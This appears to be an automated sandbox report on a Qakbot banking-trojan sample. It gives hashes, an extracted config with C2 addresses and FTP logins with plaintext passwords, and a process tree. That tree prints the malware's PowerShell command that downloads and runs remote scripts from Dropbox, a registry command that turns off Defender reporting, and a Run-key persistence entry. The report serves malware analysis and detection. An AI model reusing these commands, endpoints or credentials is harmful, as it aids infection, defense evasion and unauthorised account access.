qakbot | 5cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1

General

Target

310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Size

596KB
MD5

310e65a59d3c670bc2bededf7ddef03e
SHA1

77153c24512610f9ff8e00bf944a9fee8c8f2974
SHA256

5cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1
SHA512

b2d7f3c16fa3f080a72b02b70319b1ab821a8910851e33e4655784f5371931782d58c92a2ddf37d0f5e429133b84481743f9b80a357e6a2615206c5e323d61a8
SSDEEP

6144:BwzoiTihMxUxXH/64Hlh64tEfqpoSliPic7p0mO2WDJNkHtcvvwzRfI5aCieTVU:GzhTicUxlGUxoVPi79qHteyfIEeT

Score

10^/10

qakbot mc06 1527585056 banker execution persistence stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1

ps1.dropper

https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1

Extracted

Family

qakbot

Version

322.358

Botnet

mc06

Campaign

1527585056

Credentials

Protocol: ftp
Host:
37.60.244.211
Port:
21
Username:
[email protected]
Password:
4AsEzIaMwi2d

Protocol: ftp
Host:
198.38.77.162
Port:
21
Username:
[email protected]
Password:
kJm6DKVPfyiv

Protocol: ftp
Host:
61.221.12.26
Port:
21
Username:
[email protected]
Password:
346HZGCMlwecz9S

Protocol: ftp
Host:
67.222.137.18
Port:
21
Username:
[email protected]
Password:
p4a8k6fE1FtA3pR

Protocol: ftp
Host:
107.6.152.61
Port:
21
Username:
[email protected]
Password:
RoP4Af0RKAAQ74V

C2

71.168.229.249:995

216.21.168.27:32101

216.218.74.196:443

46.177.55.119:443

66.222.48.40:443

93.108.180.227:443

47.40.29.239:443

184.180.157.203:2222

47.40.208.189:443

71.168.229.249:443

216.93.143.182:995

98.16.70.197:2222

75.127.141.50:995

96.248.15.254:995

74.87.248.174:2222

75.189.235.216:443

66.42.182.18:995

50.252.93.122:995

105.187.37.52:443

190.137.254.188:443

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

21 4176 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Executes dropped EXE 2 IoCs

Processes:

aehup.exeaehup.exe

pid process

1268 aehup.exe
2008 aehup.exe

flow	pid	process
21	4176	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe

pid	process
1268	aehup.exe
2008	aehup.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gtimv = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Aehupe\\aehup.exe\""	explorer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

4176 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4176	powershell.exe

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exeaehup.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	aehup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	aehup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	aehup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	aehup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	aehup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	aehup.exe

Modifies registry class 4 IoCs

Processes:

RuntimeBroker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory	RuntimeBroker.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

552 PING.EXE

pid	process
552	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exeaehup.exepowershell.exeaehup.exeexplorer.exesihost.exesvchost.exetaskhostw.exeExplorer.EXEsvchost.exeStartMenuExperienceHost.exeRuntimeBroker.exeRuntimeBroker.exeRuntimeBroker.exeTextInputHost.exemsedge.exemsedge.exemsedge.exemsedge.exeRuntimeBroker.exeRuntimeBroker.exe

pid	process
1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
5072	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
5072	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
5072	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
5072	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
1268	aehup.exe
1268	aehup.exe
4176	powershell.exe
4176	powershell.exe
4176	powershell.exe
2008	aehup.exe
2008	aehup.exe
2008	aehup.exe
2008	aehup.exe
3636	explorer.exe
3636	explorer.exe
2828	sihost.exe
2828	sihost.exe
3636	explorer.exe
3636	explorer.exe
2968	svchost.exe
2968	svchost.exe
2976	taskhostw.exe
2976	taskhostw.exe
3432	Explorer.EXE
3432	Explorer.EXE
3572	svchost.exe
3572	svchost.exe
3844	StartMenuExperienceHost.exe
3936	RuntimeBroker.exe
3936	RuntimeBroker.exe
3456	RuntimeBroker.exe
3456	RuntimeBroker.exe
4368	RuntimeBroker.exe
4368	RuntimeBroker.exe
776	TextInputHost.exe
3288	msedge.exe
3288	msedge.exe
3896	msedge.exe
3896	msedge.exe
3764	msedge.exe
4848	msedge.exe
4848	msedge.exe
2968	svchost.exe
2968	svchost.exe
4716	RuntimeBroker.exe
4716	RuntimeBroker.exe
3856	RuntimeBroker.exe
3856	RuntimeBroker.exe
3572	svchost.exe
3572	svchost.exe
3636	explorer.exe
3636	explorer.exe
2968	svchost.exe
2968	svchost.exe
3636	explorer.exe
3636	explorer.exe
3572	svchost.exe
3572	svchost.exe
3636	explorer.exe
3636	explorer.exe
2968	svchost.exe
2968	svchost.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

aehup.exe

pid process

1268 aehup.exe

pid	process
1268	aehup.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	4176	powershell.exe
Token: SeShutdownPrivilege	3432	Explorer.EXE
Token: SeCreatePagefilePrivilege	3432	Explorer.EXE
Token: SeShutdownPrivilege	3432	Explorer.EXE
Token: SeCreatePagefilePrivilege	3432	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exeaehup.execmd.exeexplorer.exe

description	pid	process	target process
PID 1112 wrote to memory of 5072	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
PID 1112 wrote to memory of 5072	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
PID 1112 wrote to memory of 5072	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
PID 1112 wrote to memory of 1268	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	aehup.exe
PID 1112 wrote to memory of 1268	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	aehup.exe
PID 1112 wrote to memory of 1268	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	aehup.exe
PID 1112 wrote to memory of 1856	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	reg.exe
PID 1112 wrote to memory of 1856	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	reg.exe
PID 1112 wrote to memory of 4176	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	powershell.exe
PID 1112 wrote to memory of 4176	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	powershell.exe
PID 1268 wrote to memory of 2008	1268	aehup.exe	aehup.exe
PID 1268 wrote to memory of 2008	1268	aehup.exe	aehup.exe
PID 1268 wrote to memory of 2008	1268	aehup.exe	aehup.exe
PID 1112 wrote to memory of 768	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	cmd.exe
PID 1112 wrote to memory of 768	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	cmd.exe
PID 1112 wrote to memory of 768	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	cmd.exe
PID 768 wrote to memory of 552	768	cmd.exe	PING.EXE
PID 768 wrote to memory of 552	768	cmd.exe	PING.EXE
PID 768 wrote to memory of 552	768	cmd.exe	PING.EXE
PID 1268 wrote to memory of 3636	1268	aehup.exe	explorer.exe
PID 1268 wrote to memory of 3636	1268	aehup.exe	explorer.exe
PID 1268 wrote to memory of 3636	1268	aehup.exe	explorer.exe
PID 1268 wrote to memory of 3636	1268	aehup.exe	explorer.exe
PID 3636 wrote to memory of 2828	3636	explorer.exe	sihost.exe
PID 3636 wrote to memory of 2828	3636	explorer.exe	sihost.exe
PID 3636 wrote to memory of 2828	3636	explorer.exe	sihost.exe
PID 3636 wrote to memory of 2968	3636	explorer.exe	svchost.exe
PID 3636 wrote to memory of 2968	3636	explorer.exe	svchost.exe
PID 3636 wrote to memory of 2968	3636	explorer.exe	svchost.exe
PID 3636 wrote to memory of 2976	3636	explorer.exe	taskhostw.exe
PID 3636 wrote to memory of 2976	3636	explorer.exe	taskhostw.exe
PID 3636 wrote to memory of 2976	3636	explorer.exe	taskhostw.exe
PID 3636 wrote to memory of 3432	3636	explorer.exe	Explorer.EXE
PID 3636 wrote to memory of 3432	3636	explorer.exe	Explorer.EXE
PID 3636 wrote to memory of 3432	3636	explorer.exe	Explorer.EXE
PID 3636 wrote to memory of 3572	3636	explorer.exe	svchost.exe
PID 3636 wrote to memory of 3572	3636	explorer.exe	svchost.exe
PID 3636 wrote to memory of 3572	3636	explorer.exe	svchost.exe
PID 3636 wrote to memory of 3748	3636	explorer.exe	DllHost.exe
PID 3636 wrote to memory of 3748	3636	explorer.exe	DllHost.exe
PID 3636 wrote to memory of 3748	3636	explorer.exe	DllHost.exe
PID 3636 wrote to memory of 3844	3636	explorer.exe	StartMenuExperienceHost.exe
PID 3636 wrote to memory of 3844	3636	explorer.exe	StartMenuExperienceHost.exe
PID 3636 wrote to memory of 3844	3636	explorer.exe	StartMenuExperienceHost.exe
PID 3636 wrote to memory of 3936	3636	explorer.exe	RuntimeBroker.exe
PID 3636 wrote to memory of 3936	3636	explorer.exe	RuntimeBroker.exe
PID 3636 wrote to memory of 3936	3636	explorer.exe	RuntimeBroker.exe
PID 3636 wrote to memory of 4020	3636	explorer.exe	SearchApp.exe
PID 3636 wrote to memory of 4020	3636	explorer.exe	SearchApp.exe
PID 3636 wrote to memory of 4020	3636	explorer.exe	SearchApp.exe
PID 3636 wrote to memory of 3456	3636	explorer.exe	RuntimeBroker.exe
PID 3636 wrote to memory of 3456	3636	explorer.exe	RuntimeBroker.exe
PID 3636 wrote to memory of 3456	3636	explorer.exe	RuntimeBroker.exe
PID 3636 wrote to memory of 4368	3636	explorer.exe	RuntimeBroker.exe
PID 3636 wrote to memory of 4368	3636	explorer.exe	RuntimeBroker.exe
PID 3636 wrote to memory of 4368	3636	explorer.exe	RuntimeBroker.exe
PID 3636 wrote to memory of 776	3636	explorer.exe	TextInputHost.exe
PID 3636 wrote to memory of 776	3636	explorer.exe	TextInputHost.exe
PID 3636 wrote to memory of 776	3636	explorer.exe	TextInputHost.exe
PID 3636 wrote to memory of 3288	3636	explorer.exe	msedge.exe
PID 3636 wrote to memory of 3288	3636	explorer.exe	msedge.exe
PID 3636 wrote to memory of 3288	3636	explorer.exe	msedge.exe
PID 3636 wrote to memory of 3896	3636	explorer.exe	msedge.exe
PID 3636 wrote to memory of 3896	3636	explorer.exe	msedge.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2968

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2976

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3432

C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"
2⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1112

C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe" /C
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:5072

C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1268

C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe" /C
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:2008

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3636

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
3⤵
PID:1856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\mharlqxsphmtnmrgcqbpshzjhd.txt'"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4176

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\SysWOW64\PING.EXE
ping.exe -n 6 127.0.0.1
4⤵
- Runs ping.exe
PID:552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3572

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3748

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3844

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3936

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4020

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3456

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4368

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x238,0x23c,0x240,0x234,0x260,0x7ffbfd89ceb8,0x7ffbfd89cec4,0x7ffbfd89ced0
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2256,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=2124 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1948,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=2424 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2404,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=3336 /prefetch:8
2⤵
PID:3632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4176,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4100 /prefetch:8
2⤵
PID:1572

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
1⤵
PID:4896

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4716

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3856

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
47KB

MD5
11b47e74dc0dcb35df32bd7eda4bafa9

SHA1
f7712ef8034bf5ebe191a0d1fa0ff2d2c56018fd

SHA256
ef1666a43273ec68e4a04c2274e03a45e2365d4ccae40b70d11542054860f8cd

SHA512
91b0ffe75a66c12402f7f280bb6fc10456301136263f0d7a36d3544e0746b843dc809b4bea74fdd350475dc76e447b6c56202ce534c3aecbc0698f3652691154

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2shvbiyq.ghu.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehu.dat
Filesize
92B

MD5
6bc7e90319080872ea7ba9b18d821155

SHA1
cbe2b2ce9a1267986a672207f7bbdfe067689bc5

SHA256
27eee1a25a4e6ec5f10e408550df291f846ca63ac51ba3d66a5fd0846d8481e6

SHA512
c879842629acdd57bce3a0175e360dd36391f693e057c38e960dea8d7abc345c4f221a27a3070a63ffb1c1010bbd00a780b91afb7595a51e883862f7c77fe6df

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe
Filesize
596KB

MD5
310e65a59d3c670bc2bededf7ddef03e

SHA1
77153c24512610f9ff8e00bf944a9fee8c8f2974

SHA256
5cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1

SHA512
b2d7f3c16fa3f080a72b02b70319b1ab821a8910851e33e4655784f5371931782d58c92a2ddf37d0f5e429133b84481743f9b80a357e6a2615206c5e323d61a8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup32.dll
Filesize
357B

MD5
32ea6b0edb3702440a576ab7c1e8f776

SHA1
401c6c83e558c08b49ba819e6dc66f07dfa5a21b

SHA256
7b102b8219bb1f4bddb398e8e4405811bb5a29afc6b31506dfb83fcc2dcbc455

SHA512
2c98beedadbd5d2989944687c575ba8d64db21aa8b406e967153978cc3d19bf3d0378358f4902016a53b11bef3830fd99a884b85ee99d8394a77cc5f3ebe7d68

Download Submit
memory/776-85-0x0000000000330000-0x000000000035C000-memory.dmp

Filesize
176KB

Download
memory/1112-2-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/1112-40-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/1112-0-0x00000000005C0000-0x00000000005C6000-memory.dmp

Filesize
24KB

Download
memory/1112-32-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/1268-18-0x0000000000680000-0x0000000000686000-memory.dmp

Filesize
24KB

Download
memory/1268-42-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2008-41-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2828-46-0x0000000000900000-0x0000000000901000-memory.dmp

Filesize
4KB

Download
memory/2828-47-0x00000000008A0000-0x00000000008CC000-memory.dmp

Filesize
176KB

Download
memory/2968-50-0x00000000008F0000-0x000000000091C000-memory.dmp

Filesize
176KB

Download
memory/2976-53-0x0000000000300000-0x000000000032C000-memory.dmp

Filesize
176KB

Download
memory/3432-56-0x0000000000B00000-0x0000000000B2C000-memory.dmp

Filesize
176KB

Download
memory/3456-79-0x0000000000B00000-0x0000000000B2C000-memory.dmp

Filesize
176KB

Download
memory/3572-59-0x0000000000140000-0x000000000016C000-memory.dmp

Filesize
176KB

Download
memory/3636-64-0x0000000002890000-0x00000000028BF000-memory.dmp

Filesize
188KB

Download
memory/3636-43-0x0000000000A90000-0x0000000000AFA000-memory.dmp

Filesize
424KB

Download
memory/3636-45-0x0000000000A90000-0x0000000000AFA000-memory.dmp

Filesize
424KB

Download
memory/3636-62-0x0000000002890000-0x00000000028BF000-memory.dmp

Filesize
188KB

Download
memory/3636-63-0x0000000000A90000-0x0000000000AFA000-memory.dmp

Filesize
424KB

Download
memory/3636-66-0x0000000002890000-0x00000000028BF000-memory.dmp

Filesize
188KB

Download
memory/3636-65-0x0000000002890000-0x00000000028BF000-memory.dmp

Filesize
188KB

Download
memory/3748-69-0x0000000000BE0000-0x0000000000C0C000-memory.dmp

Filesize
